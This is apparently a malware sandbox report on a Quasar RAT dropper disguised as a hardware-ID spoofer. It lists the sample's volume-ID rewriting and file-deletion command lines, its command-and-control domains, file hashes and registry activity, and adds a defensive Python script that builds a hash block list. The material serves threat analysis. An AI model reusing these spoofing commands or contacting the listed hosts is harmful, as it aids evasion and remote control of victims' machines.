C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H

Network

Country Destination Domain Proto
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 gaming7core.info udp
RU 45.15.156.156:80 gaming7core.info tcp

Files

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 dd3e0eec26c9e936db64082d4d10d630
SHA1 a8eedd3e25644559db18b701edfb2370cfbaf52c
SHA256 1b3a1bc69df6d980c9c1e7b76429228dad8055262b35b244fde908a7c40b4127
SHA512 1bfc930f23f121dfd555fbbaf82e5f627306be8e97ec728deb4e42842f654d327818e76950b5070029128a6994f29e2d3133e1e4cef814dfdea95bfe4f09445f

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 8197930458a6153c34a1b03e4bcb5375
SHA1 59c211de4e3c7bd592acf9223fe2bdd8b5dbee12
SHA256 771368641b8fd02433767c4e755f40b48f53fb3c89e4c904d427221b82859d25
SHA512 1a25b723cc8edbbb4edddb3b5ff21dfab0d1226f8d225b9417a27d6a67322184092913c9d16a76e91d48fada13e6a345919014d66ca19a745a511f7bca688b3b

\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 a68e092df53d94b14a2e69e6eb374f76
SHA1 199ad2f87b32c28bbf1b2b0cc448e8df7717e38a
SHA256 7273c865aafc7c2ee2cf55287a4f998da8e754380f57bb585a7d615016c7437c
SHA512 099eaf461169f56712482d520b6be2b9644fb1e6b5e2866f22af5c3da5771828d30e10bab4cf1a4136e0256640473dbdaf9e19445504f11e7be216446c01863e

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 cafbd27af223f6f85c3b0697e719dacd
SHA1 95a1e81a2602b422e419577e00b6ad548d1cbfa9
SHA256 8711716333b3f16cb0358db530b55b174c8042e1a2dbedf89d7eacb072e242e9
SHA512 d2dbb9f6f3e9bed249eee6d0d990d71689c525551011f4286a0682d98114571e6b2e495be87589e86ef580f7a4131af8864cfabd3ae28f8715673c2823474304

\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 77d0ad29a3bd8dbf604f101c9cddf8d4
SHA1 86583cb1caf29864cff7f115e405c464fe18647f
SHA256 35c967b02ac8e966a5a6a8b5267be478d53f406a1862ca4dc4c99f4151b596ee
SHA512 e22973df55dccdcd18aba65735a89b8b0fd1f58d78fa30c01b0e547b8af2d00395ab4c56a975da55a0d28e1c6602a06892fcc7ba87569a5a0751e56c9eb19fe1

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 cb63ac7833db68a31f0279f762644488
SHA1 182a9ab8fada225c3095556c085e22aa350df98f
SHA256 06697e8f8792f58c95e6e0a7e90d8f4bebfefe7534128942235008ebca1ac51b
SHA512 86d5154104c83d9c2339faeee73276d29e2c7ef0f8d939ae812eecd73b8721cb4ca90ab5c5f3f7837f7114a1a0395bf078deeddefe29a87322f616773ee67f39

memory/2912-75-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2912-74-0x0000000000300000-0x0000000000624000-memory.dmp

memory/2424-85-0x0000000000190000-0x000000000019E000-memory.dmp

memory/2424-87-0x00000000773C0000-0x00000000773C1000-memory.dmp

memory/2728-91-0x0000000074020000-0x00000000745CB000-memory.dmp

memory/2424-95-0x00000000003F0000-0x00000000003FE000-memory.dmp

memory/2424-93-0x00000000003E0000-0x00000000003EC000-memory.dmp

memory/2424-99-0x0000000077370000-0x0000000077371000-memory.dmp

memory/2424-100-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-98-0x0000000000410000-0x000000000041C000-memory.dmp

memory/2424-101-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-96-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2424-102-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-103-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-105-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2912-106-0x000000001B1E0000-0x000000001B260000-memory.dmp

memory/2424-107-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-108-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2912-104-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/2424-109-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2424-90-0x00000000003D0000-0x00000000003DE000-memory.dmp

memory/2424-88-0x00000000773B0000-0x00000000773B1000-memory.dmp

memory/2424-86-0x00000000773D0000-0x00000000773D1000-memory.dmp

memory/2424-83-0x00000000001B0000-0x00000000001C8000-memory.dmp

memory/1780-140-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2424-134-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

memory/1780-154-0x0000000002E40000-0x0000000002EC0000-memory.dmp

memory/1780-156-0x0000000002E40000-0x0000000002EC0000-memory.dmp

memory/1844-158-0x0000000002E80000-0x0000000002F00000-memory.dmp

memory/1656-162-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1656-166-0x0000000002844000-0x0000000002847000-memory.dmp

memory/1844-167-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1656-165-0x0000000002840000-0x00000000028C0000-memory.dmp

memory/992-164-0x0000000002DFB000-0x0000000002E62000-memory.dmp

memory/1780-163-0x0000000002E44000-0x0000000002E47000-memory.dmp

memory/1656-161-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1844-160-0x0000000002E80000-0x0000000002F00000-memory.dmp

memory/1844-159-0x0000000002E80000-0x0000000002F00000-memory.dmp

memory/1844-157-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1780-155-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1780-153-0x000007FEEC140000-0x000007FEECADD000-memory.dmp

memory/1780-152-0x00000000004B0000-0x00000000004B8000-memory.dmp

memory/2424-81-0x00000000773E0000-0x00000000773E1000-memory.dmp

memory/2424-80-0x0000000000170000-0x000000000018C000-memory.dmp

memory/2424-78-0x0000000000140000-0x000000000014E000-memory.dmp

memory/2912-76-0x000000001B1E0000-0x000000001B260000-memory.dmp

memory/2400-73-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 df27546a0553738685e64842cbe488b3
SHA1 2959ef89fdce215a4dc1ab58f636734b72266ebb
SHA256 bc4d1bab345f2fb5f779c6f9ac8e48bbc98453e9256d48bd65ea3b91d2893f61
SHA512 e10beef1284952b5c3b5c232acc5c0d7ccaf9f011325731f2efad19d210489d00ef959e0e3c401f7701332d9c96d94397593ab88d4719edb73d8aafbff9a5d70

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 c4c48a3b867e307f9f5e1d1e329ae885
SHA1 f77131b77313dfe5e98eda0868fab4149ad02c7b
SHA256 00a561a5245fe91fd2d51f6304e430165e73bff4590757f54d6e283044f5162f
SHA512 5a86923bbf017739dddecd8acd5ee3c350dd8a28c66b6cfa8013a97b5942a12eedaa67bc663c8bcedbf7cb3946936c8f9c3ed84a94bff9cfebb0faf99c413f25

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 4b1723d1ea5cbb7ee2e2aecbcaac82d1
SHA1 a28a3de71a40871bf865219720dbc329ff72a131
SHA256 567c26b6ba6410d278b1db4bbbed7e041050c7236b4c58f06a93fcc1354f0a0f
SHA512 3de1fc799756c8f9d96d2f17073ccda646b213abb48011cff79775d9071b5ebade20a6850ca9a36b1f6311697213f03556027ab94a9ad4929f62c041bdd2301a

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 305412bd89f0ba963d98efc8e066e9ca
SHA1 12adae50dc2366b8df7706553d86da698702c118
SHA256 c8c74050d36463a4ca13db903cde8e2405dca6df01e380f26ea08f1643c886a8
SHA512 acc0881f5e88231317477becbd07b4bd37bfabbc0819e6b2d0afde1a5c0b32348675fc4b89b57fd0b3a41459383dea76e21fc6c99b57e5961e203df29108b303

\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 79337964db81ce4114b63d41ffb36aa9
SHA1 be2adbff05b94d71e77f5afbf9dc88db287d9d02
SHA256 adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb
SHA512 13831d3e1bf8d92455cdd2e51d6397dbef1b83b6cb789f2eba7011671287c4449ca4337b6b3ed9576129b90f7c3c670eea7cbf4c4147f1ebe14a6d0f0b33584f

\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

memory/2400-21-0x000000001AFA0000-0x000000001B020000-memory.dmp

memory/2740-19-0x0000000000400000-0x0000000001274000-memory.dmp

memory/1428-16-0x0000000074950000-0x0000000074EFB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 41108a3d0f4912dd44a4028e2b1f99cb
SHA1 663019303ee07b73f8185fe8a9e5fc4d977a0485
SHA256 7764f6f5cb802de31b9164cc171fca00bd1f4d0195e1e888b540f0c04285a6c2
SHA512 39283ce81991ff932f4262bc8ad99f49242225def31168acd1f88679c8454bea3906d0e68c8a57678ceef40de47c61b485f4d44d3ba7ca490518e2a6a748e95e

\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 51c7515b35778ed49a89f2a5bdad46e2
SHA1 9f11f219eb26375fb2744ef885ddae2a520c9fc5
SHA256 e8f421e653c120ee10c60b54b9a2e09f9063750b0f388a8ffcbbda245bc6ebab
SHA512 4e174fb4b8b3560280f6f05229900b46058080820ea15e70e21c478b5341a0086898a5a530a3976faa1d991a0cbbc89fb835628c01fd933a435cb5ca3316fcc5

memory/1792-285-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-283-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-282-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-281-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-280-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1792-279-0x0000000140000000-0x000000014000E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab9E44.tmp

MD5 84a4974c2d22f28abf6e058f8485b9f9
SHA1 397635c06953c1b55290922481c9af07a95a45ab
SHA256 baa03ff90c1c45a132de3de72c8352e1b5eee5bf17bd47f2b42dc460d7225d05
SHA512 6545b960ee236c9ff8378052a673b90a38e596eb5a954900022b2b2d6a36593f927b3662135e480069fd5646eab23849bcd035bdd7882ee3e85cacc1be2416df
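The file entries above are the raw material for a block list, but two things in them trip up a naive copy-and-paste: HpsrSpoof.exe is listed once with the digests of an empty file, and several paths (Client.exe, sp_hyperRuntimedhcpSvc.exe, SPOOFER.exe) appear more than once with different digests because the dropper rewrote them during the run, so every version is an indicator. The Python below is an added example, not part of the sandbox report: it parses entries in this report's layout (a constructed excerpt of the entries above is embedded inline), drops the empty-file record, groups by path to show which files were replaced, and emits the SHA256 values worth blocking. Treating "C:\X" and "\X" as one object is an assumption made because the report lists the same file under both spellings.

```python
"""Turn a sandbox report's dropped-file entries into a de-duplicated IOC list.

Added example, not part of the original report. SAMPLE is a constructed
excerpt of the report's own file entries (a path line followed by hash
lines, with memory-dump lines interleaved) so the script runs offline.
"""
import re
from collections import defaultdict

# Digests of zero-byte input: a record carrying these describes an empty file.
EMPTY_FILE = {
    "MD5": "d41d8cd98f00b204e9800998ecf8427e",
    "SHA1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    "SHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    "SHA512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
              "47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
}
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")

SAMPLE = r"""
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

memory/2424-37-0x0000000000BA0000-0x0000000000C8A000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

SHA256 bc4d1bab345f2fb5f779c6f9ac8e48bbc98453e9256d48bd65ea3b91d2893f61

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

SHA256 00a561a5245fe91fd2d51f6304e430165e73bff4590757f54d6e283044f5162f

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

SHA256 c8c74050d36463a4ca13db903cde8e2405dca6df01e380f26ea08f1643c886a8

\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

SHA256 adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb
"""


def normalize_path(path):
    """Case-fold and drop a leading drive letter: the report lists the same
    object both as 'C:\\X' and as '\\X', and they must collapse to one key."""
    p = path.strip().lower()
    if len(p) > 2 and p[1] == ":" and p[2] == "\\":
        p = p[2:]
    return p


def parse_files(text):
    """Return records {'path', 'key', 'hashes'} in report order. A non-blank
    line that is neither a hash line nor a memory-dump line opens a record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("memory/"):
            continue
        m = HASH_LINE.match(line)
        if m is None:
            current = {"path": line, "key": normalize_path(line), "hashes": {}}
            records.append(current)
            continue
        algo, digest = m.group(1), m.group(2).lower()
        if current is None:
            raise ValueError(f"hash line before any path: {line}")
        if len(digest) != HASH_LEN[algo]:
            raise ValueError(f"{algo} digest has wrong length: {digest}")
        current["hashes"][algo] = digest
    return records


def is_empty_file(record):
    """True when every digest on the record is the zero-byte digest."""
    h = record["hashes"]
    return bool(h) and all(h[a] == EMPTY_FILE[a] for a in h)


def overwritten_paths(records):
    """key -> distinct SHA256 list for paths captured with more than one
    content: the file was replaced during the run, and every version is
    an indicator, not only the last one."""
    seen = defaultdict(list)
    for r in records:
        sha = r["hashes"].get("SHA256")
        if sha and sha not in seen[r["key"]]:
            seen[r["key"]].append(sha)
    return {k: v for k, v in seen.items() if len(v) > 1}


def sha256_iocs(records):
    """Sorted, de-duplicated SHA256 values worth blocking (empty file excluded)."""
    return sorted({r["hashes"]["SHA256"] for r in records
                   if "SHA256" in r["hashes"] and not is_empty_file(r)})


if __name__ == "__main__":
    recs = parse_files(SAMPLE)
    print(len(recs), "records; rewritten during run:", overwritten_paths(recs))
    print("SHA256 IOCs:", *sha256_iocs(recs), sep="\n  ")
```

Feed it the full file list rather than the excerpt and the overwritten-path map is the more useful output: a path that changes content three or four times in a 46-second run is a staging location the dropper keeps reusing, which is worth a file-creation rule of its own regardless of hash.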

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-28 18:55

Reported

2023-12-28 18:58

Platform

win10v2004-20231215-en

Max time kernel

46s

Max time network

189s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

6 hits; the sandbox recorded no description, indicator, process or target for any of them.

Nirsoft

15 hits; the sandbox recorded no description, indicator, process or target for any of them. DevManView.exe, which appears in the process column of later tables and runs from C:\ProgramData\Microsoft\Windows\, is the NirSoft Device Manager viewer, a legitimate utility the sample uses.

Creates new service(s)

persistence

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A

Note: Geo\Nation is the value read by the GetUserGeoID API (and by .NET's RegionInfo on top of it), so this signature is a weak signal on its own; what makes it worth recording here is which processes issued the read.

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\System32\Conhost.exe N/A
File opened (read-only) \??\F: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\wusa.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\Conhost.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\conhost.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\wusa.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\conhost.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\powercfg.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\F: C:\Windows\System32\cmd.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\powercfg.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\wusa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\wusa.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\Windows\system32\wusa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\system32\wusa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\System32\cmd.exe N/A
